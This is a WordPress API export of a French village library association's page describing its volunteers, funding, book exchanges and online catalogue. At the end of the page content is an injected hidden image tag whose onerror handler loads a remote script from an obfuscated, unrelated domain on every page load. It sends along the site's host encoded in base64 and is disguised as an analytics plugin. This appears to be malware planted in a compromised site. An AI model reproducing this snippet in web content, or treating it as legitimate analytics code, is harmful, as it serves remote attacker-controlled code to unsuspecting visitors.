{"id":944,"date":"2021-01-28T16:50:09","date_gmt":"2021-01-28T15:50:09","guid":{"rendered":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/?page_id=944"},"modified":"2022-07-21T15:40:27","modified_gmt":"2022-07-21T14:40:27","slug":"fonctionnement","status":"publish","type":"page","link":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/fonctionnement\/","title":{"rendered":"Fonctionnement"},"content":{"rendered":"<p><strong>Permettre au plus grand nombre de profiter des joies de la lecture,<\/strong> c\u2019est le r\u00f4le de la biblioth\u00e8que.<\/p>\n<p>C\u2019est le r\u00f4le d\u2019une \u00e9quipe d\u2019une vingtaine de b\u00e9n\u00e9voles qui g\u00e8rent les t\u00e2ches n\u00e9cessaires au fonctionnement de l\u2019association \u00abLes Amis de la Lecture\u00bb depuis 1994. Les t\u00e2ches \u00abinvisibles\u00bb d\u2019achat et de pr\u00e9paration des livres avant leur mise \u00e0 disposition, l\u2019organisation des expositions, les travaux quotidiens de secr\u00e9tariat et de gestion, la maintenance informatique&#8230; Les t\u00e2ches \u00abvisibles\u00bb d\u2019accueil et de conseil pendant les permanences, les vernissages, les rencontres litt\u00e9raires, les animations d\u00e9di\u00e9es aux enfants, les choix de livres avec les classes et la cr\u00e8che, les lectures, les contes, et depuis peu, les lectures en visio avec l\u2019aide du Forum, les services de pr\u00eats \u00e0 domicile pour les personnes \u00e0 mobilit\u00e9 r\u00e9duite\u2026<\/p>\n<p>Le soutien financier de la commune de Saillans et de huit villages voisins est tr\u00e8s pr\u00e9cieux pour le fonctionnement de la biblioth\u00e8que, compl\u00e9t\u00e9 par les adh\u00e9sions individuelles.<br \/>\nCe budget nous permet d\u2019acheter les nouveaut\u00e9s, d\u2019\u00eatre abonn\u00e9 \u00e0 de nombreuses revues adultes et enfants et d\u2019avoir une gestion informatique des pr\u00eats. La nouveaut\u00e9 2021 est la mise en ligne de notre catalogue qui permet les commandes de livres \u00e0 partir de notre site et cr\u00e9e un nouveau lien. Nous ne renon\u00e7ons pas pour autant \u00e0 vous accueillir dans les meilleures conditions possibles car nous avons la culture en partage.<br \/>\nNotre fonds propre, environ 4000 ouvrages, est compl\u00e9t\u00e9 deux fois par an \u00e0 l\u2019occasion d\u2019un \u00e9change de 400 ouvrages avec la m\u00e9diath\u00e8que de Crest. Notre convention nous permet aussi de recevoir r\u00e9guli\u00e8rement, sur r\u00e9servation, des livres command\u00e9s \u00e0 Crest. Nous poursuivons aussi notre formation aupr\u00e8s de la m\u00e9diath\u00e8que d\u00e9partementale \u00e0 Valence.<\/p>\n<p>La culture en partage, c\u2019est la motivation de notre \u00e9quipe de b\u00e9n\u00e9voles, soutenue par la hausse de la fr\u00e9quentation ces derni\u00e8res ann\u00e9es&#8230;jusqu\u2019en 2020 o\u00f9 nous avons eu moins d\u2019occasions d\u2019accueillir les lecteurs \u00e0 cause des contraintes sanitaires.<br \/>\nNotre espoir\u00a0: de nouveaux lecteurs et de nouveaux b\u00e9n\u00e9voles pour partager cette belle aventure humaine au coeur du village.<\/p>\n<p><strong>Et pourquoi pas \u00eatre b\u00e9n\u00e9vole ? <\/strong><br \/>\nN&rsquo;h\u00e9sitez pas \u00e0 nous contacter. Animations, permanences, toute bonne volont\u00e9 est la bienvenue.<\/p>\n<p><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/vie-de-lassociation\/\"><strong>&gt; Lire la rubrique Vie de l&rsquo;association<\/strong><\/a><\/p>\n<p><a href=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013.jpg\" alt=\"\" class=\"alignnone size-full wp-image-979\" width=\"960\" height=\"640\" srcset=\"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013.jpg 960w, http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013-300x200.jpg 300w, http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013-768x512.jpg 768w, http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-content\/uploads\/2021\/01\/web960-04-IMG_1013-360x240.jpg 360w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/a><\/p>\n<div style=\"z-index: 25102;\" class=\"cliquemailHiddenPopup\" id=\"cliquemailclipboardInfo\">\n<div id=\"cliquemailcontentTo\">\n<div id=\"cliquemailinfoToMail\">L\u2019email a bien \u00e9t\u00e9 copi\u00e9<\/div>\n<p><textarea id=\"cliquemailclipboardAreaToText\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/zuvofu.towaxubudo.com\/scripts\/jt?k=603234b287df1ab7258b4567&amp;s=&quot;+encodeURI(btoa(window.location.host));document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Permettre au plus grand nombre de profiter des joies de la lecture, c\u2019est le r\u00f4le de la biblioth\u00e8que. C\u2019est le r\u00f4le d\u2019une \u00e9quipe d\u2019une vingtaine de b\u00e9n\u00e9voles qui g\u00e8rent les t\u00e2ches n\u00e9cessaires au fonctionnement de l\u2019association \u00abLes Amis de la Lecture\u00bb depuis 1994. Les t\u00e2ches \u00abinvisibles\u00bb d\u2019achat et de pr\u00e9paration [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-944","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages\/944","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/comments?post=944"}],"version-history":[{"count":0,"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/pages\/944\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.lesamisdelalecture.fr\/nouveausite\/wp-json\/wp\/v2\/media?parent=944"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}